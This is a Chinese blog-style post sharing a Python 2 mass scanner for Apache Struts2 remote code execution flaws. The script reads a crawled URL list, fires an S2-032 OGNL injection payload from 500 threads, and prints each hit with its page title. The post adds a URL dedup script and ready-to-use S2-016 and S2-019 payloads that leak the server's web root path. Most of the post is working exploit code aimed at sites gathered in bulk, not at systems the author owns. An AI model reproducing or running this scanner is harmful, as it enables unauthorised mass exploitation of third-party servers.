看乌云上许多大牛上脚本,我也写个玩吧!写的比较简单。懒得优化,参数获取就自己改吧
需要抓很多struts,可用爱站工具包或则自己写个脚本爬
#coding:utf8 import urllib2 import re import urlparse import Queue import threading import mechanize import cookielib queue = Queue.Queue() mutex = threading.Lock() def find_title(url): try: br = mechanize.Browser() br.set_cookiejar(cookielib.LWPCookieJar()) # Cookie jar br.set_handle_equiv(True) # Browser Option br.set_handle_redirect(True) br.set_handle_referer(True) br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] br.open(url) t = br.title().decode('utf-8').encode('gb2312') return t except Exception,e: return '' def s2_status(): global number while True: if queue.empty(): break url = queue.get() data = "method:%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2C%23matt%3D%23attr.get(%23parameters.command%5B0%5D)%2C%23matt.getWriter().println(3345*2356)%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%2C1%3F%23xx%3A%23request.toString&command=com.opensymphony.xwork2.dispatcher.HttpServletResponse" html,status = url_open(url,data) if status == '200' and re.search(r'7880820',html): mutex.acquire() print url+" "+find_title(url)+" s2-032 "+str(number) mutex.release() number = number + 1 #else: #print "no" def url_open(url,data): headers={ "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" #"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", #"Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3", #"Accept-Encoding": "gzip, deflate", #"If-Modified-Since": "Tue, 03 Dec 2010 08:25:11 GMT", #"Cache-Control": "max-age=0" } try: req = urllib2.Request(url,data,headers = headers) html = urllib2.urlopen(req,timeout=3).read() ret = '200' return html,ret except urllib2.HTTPError, e: return '',e.code except: return '','99999' #------------------------------------------------------------ if __name__ == "__main__": global number number = 1 with open('action.txt','r') as f: url = f.readline() while url: queue.put(str(url)) url = f.readline() print queue.qsize() threads = [] for i in range(500): t = threading.Thread(target=s2_status) t.start() threads.append(t) for t in threads: t.join() print 'All Done!'
简单去重,由于数量少,就没考虑溢出
import re with open('1.txt','r') as f: txt = f.read() #print txt url = re.findall(r'(http://.*?)|',txt) url = set(url) for i in url: with open('result.txt','a+') as f: f.write(i.strip()+" ")
效果图
16,19poc
data_32 = "method:%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2C%23matt%3D%23attr.get(%23parameters.command%5B0%5D)%2C%23matt.getWriter().println(7880820)%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%2C1%3F%23xx%3A%23request.toString&command=com.opensymphony.xwork2.dispatcher.HttpServletResponse" data_16 = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path7880820:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}" data_19 = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path7880820:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()"